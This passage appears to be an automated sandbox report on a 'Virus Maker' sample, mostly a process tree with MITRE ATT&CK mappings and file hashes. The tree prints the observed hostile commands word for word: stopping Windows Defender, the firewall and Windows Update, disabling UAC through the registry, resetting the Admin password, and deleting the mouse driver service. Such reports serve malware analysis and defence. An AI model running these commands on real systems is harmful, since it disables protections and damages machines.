  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:8
  2⤵
  PID:3272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:8
  2⤵
  PID:4868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2700 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:1
  2⤵
  PID:4488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2888 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:1
  2⤵
  PID:836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:8
  2⤵
  PID:1848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:8
  2⤵
  PID:2300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4712 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:1
  2⤵
  PID:676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3168 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:8
  2⤵
  PID:3476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3164 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:8
  2⤵
  - NTFS ADS
  PID:3752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:8
  2⤵
  PID:964
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Virus Maker.rar"
  2⤵
  - NTFS ADS
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2104
- - C:\Users\Admin\AppData\Local\Temp\7zO8380B3C7\Virus Maker.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO8380B3C7\Virus Maker.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:2320
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\m0essjgb\m0essjgb.cmdline"
      4⤵
      PID:4600
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES36EA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8209A32CA0B6448ABE284912F2CFB88A.TMP"
        5⤵
        
        PID:5004
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ata0pgfh\ata0pgfh.cmdline"
      4⤵
      PID:4980
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFE2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF19DB44C530E4642943D533E2719BA72.TMP"
        5⤵
        
        PID:3292
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\invseeiy\invseeiy.cmdline"
      4⤵
      PID:1348
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC69.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFEAF82EA9CB4BA8AE234ED5E2DAEE.TMP"
        5⤵
        
        PID:3756
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.blackhost.xyz./
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1272
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb866a3cb8,0x7ffb866a3cc8,0x7ffb866a3cd8
        5⤵
        
        PID:1424
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,13353106960950037513,16230943450340195138,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2016 /prefetch:2
        5⤵
        
        PID:4372
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,13353106960950037513,16230943450340195138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2496
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,13353106960950037513,16230943450340195138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
        5⤵
        
        PID:1600
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,13353106960950037513,16230943450340195138,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
        5⤵
        
        PID:2364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,13353106960950037513,16230943450340195138,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
        5⤵
        
        PID:4988
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2004,13353106960950037513,16230943450340195138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4124 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1504
    - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,13353106960950037513,16230943450340195138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3016
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\54rmbzp0\54rmbzp0.cmdline"
      4⤵
      PID:1400
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2571.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB23D4FA3D2C34336AE9582CB1BD59EF.TMP"
        5⤵
        
        PID:2520
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ipqx5u0a\ipqx5u0a.cmdline"
      4⤵
      PID:4532
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABD8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1B2771FB698B4CDCAA367B6CDCCFA0.TMP"
        5⤵
        
        PID:4612
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xhs51vdp\xhs51vdp.cmdline"
      4⤵
      PID:4724
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE4BA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1860224F32FD407E9CB1463ACDA58DF7.TMP"
        5⤵
        
        PID:2356
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xw0jubv3\xw0jubv3.cmdline"
      4⤵
      PID:3336
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87FF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1F4AFC0541B14CC68CE0C42AC0643C49.TMP"
        5⤵
        
        PID:4428
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qvmp3o1a\qvmp3o1a.cmdline"
      4⤵
      PID:3984
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcADDC439EBAAF4D2E8BA27385B29E88E.TMP"
        5⤵
        
        PID:3772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3496 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1068

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4480

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3488

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3388

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:4024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:1524
- - C:\Windows\system32\net.exe
    net stop "SDRSVC"
    3⤵
    PID:3120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SDRSVC"
      4⤵
      PID:1876
- - C:\Windows\system32\net.exe
    net stop "WinDefend"
    3⤵
    PID:4412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WinDefend"
      4⤵
      PID:2356
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im "MSASCui.exe"
    3⤵
    - Kills process with taskkill
    PID:964
- - C:\Windows\system32\net.exe
    net stop "security center"
    3⤵
    PID:764
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "security center"
      4⤵
      PID:748
- - C:\Windows\system32\net.exe
    net stop sharedaccess
    3⤵
    PID:1196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sharedaccess
      4⤵
      PID:2916
- - C:\Windows\system32\netsh.exe
    netsh firewall set opmode mode-disable
    3⤵
    - Modifies Windows Firewall
    PID:1720
- - C:\Windows\system32\net.exe
    net stop "wuauserv"
    3⤵
    PID:4000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wuauserv"
      4⤵
      PID:420

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:4612
- - C:\Windows\system32\net.exe
    net stop "SDRSVC"
    3⤵
    PID:3792
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SDRSVC"
      4⤵
      PID:4572
- - C:\Windows\system32\net.exe
    net stop "WinDefend"
    3⤵
    PID:4384
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WinDefend"
      4⤵
      PID:1548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im "MSASCui.exe"
    3⤵
    - Kills process with taskkill
    PID:4436
- - C:\Windows\system32\net.exe
    net stop "security center"
    3⤵
    PID:3460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "security center"
      4⤵
      PID:5096
- - C:\Windows\system32\net.exe
    net stop sharedaccess
    3⤵
    PID:1848
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sharedaccess
      4⤵
      PID:3912
- - C:\Windows\system32\netsh.exe
    netsh firewall set opmode mode-disable
    3⤵
    - Modifies Windows Firewall
    PID:4084
- - C:\Windows\system32\net.exe
    net stop "wuauserv"
    3⤵
    PID:1764
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wuauserv"
      4⤵
      PID:908

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:232
- - C:\Windows\system32\net.exe
    net stop "SDRSVC"
    3⤵
    PID:4812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SDRSVC"
      4⤵
      PID:2496
- - C:\Windows\system32\net.exe
    net stop "WinDefend"
    3⤵
    PID:1972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WinDefend"
      4⤵
      PID:912
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im "MSASCui.exe"
    3⤵
    - Kills process with taskkill
    PID:4464
- - C:\Windows\system32\net.exe
    net stop "security center"
    3⤵
    PID:4972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "security center"
      4⤵
      PID:3788
- - C:\Windows\system32\net.exe
    net stop sharedaccess
    3⤵
    PID:1996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sharedaccess
      4⤵
      PID:3864
- - C:\Windows\system32\netsh.exe
    netsh firewall set opmode mode-disable
    3⤵
    - Modifies Windows Firewall
    PID:1016
- - C:\Windows\system32\net.exe
    net stop "wuauserv"
    3⤵
    PID:4616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wuauserv"
      4⤵
      PID:3016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:3620

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:1844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:1068
- - C:\Windows\system32\net.exe
    net user Admin *
    3⤵
    PID:3488
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user Admin *
      4⤵
      PID:1076

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:4244
- - C:\Windows\system32\net.exe
    net user Admin *
    3⤵
    PID:4576
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user Admin *
      4⤵
      PID:3420

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:3876
- - C:\Windows\system32\net.exe
    net user Admin *
    3⤵
    PID:1924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user Admin *
      4⤵
      PID:2056

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004E0
1⤵
PID:2740

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4560

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:2468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:3440
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:912

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:2340

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:3048

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:3136

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:1764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:920
- - C:\Windows\system32\net.exe
    net user Admin *
    3⤵
    PID:3404
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user Admin *
      4⤵
      PID:1608

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:968
- - C:\Windows\system32\cmd.exe
    Cmd /k Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
    3⤵
    PID:1220
  - - C:\Windows\system32\reg.exe
      Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
      4⤵
      UAC bypass
      PID:3392

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:4876
- - C:\Windows\system32\reg.exe
    Reg Add "" /v "BSOD" /t "REG_SZ" /d "C:\Users\Admin\AppData\Local\Temp\cmd.bat" /f
    3⤵
    PID:4188

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:4964
- - C:\Windows\system32\reg.exe
    Reg Add "" /v "BSOD" /t "REG_SZ" /d "C:\Users\Admin\AppData\Local\Temp\cmd.bat" /f
    3⤵
    PID:3756

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:2356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:3876
- - C:\Windows\system32\reg.exe
    Reg Add "" /v "BSOD" /t "REG_SZ" /d "C:\Users\Admin\AppData\Local\Temp\cmd.bat" /f
    3⤵
    PID:1764

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:2944
- - C:\Windows\system32\reg.exe
    Reg Add "" /v "BSOD" /t "REG_SZ" /d "C:\Users\Admin\AppData\Local\Temp\cmd.bat" /f
    3⤵
    PID:1096

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:4976
- - C:\Windows\system32\reg.exe
    Reg Add "" /v "BSOD" /t "REG_SZ" /d "C:\Users\Admin\AppData\Local\Temp\cmd.bat" /f
    3⤵
    PID:4944

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:1888
- - C:\Windows\system32\reg.exe
    Reg Add "" /v "BSOD" /t "REG_SZ" /d "C:\Users\Admin\AppData\Local\Temp\cmd.bat" /f
    3⤵
    PID:3348

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
PID:1852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:1760
- - C:\Windows\system32\reg.exe
    Reg Add "" /v "BSOD" /t "REG_SZ" /d "C:\Users\Admin\AppData\Local\Temp\cmd.bat" /f
    3⤵
    PID:2180

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
883B

MD5
30c189996e2cd94c0215c2ab45ef1c69

SHA1
b4cc8eb114bcdbf31aa9b2cccd3dcdbd423ae278

SHA256
a076e0223b3ddfefc22bd31a12c5585a6bd1193132d0c5a7d3d1f3741cfbb232

SHA512
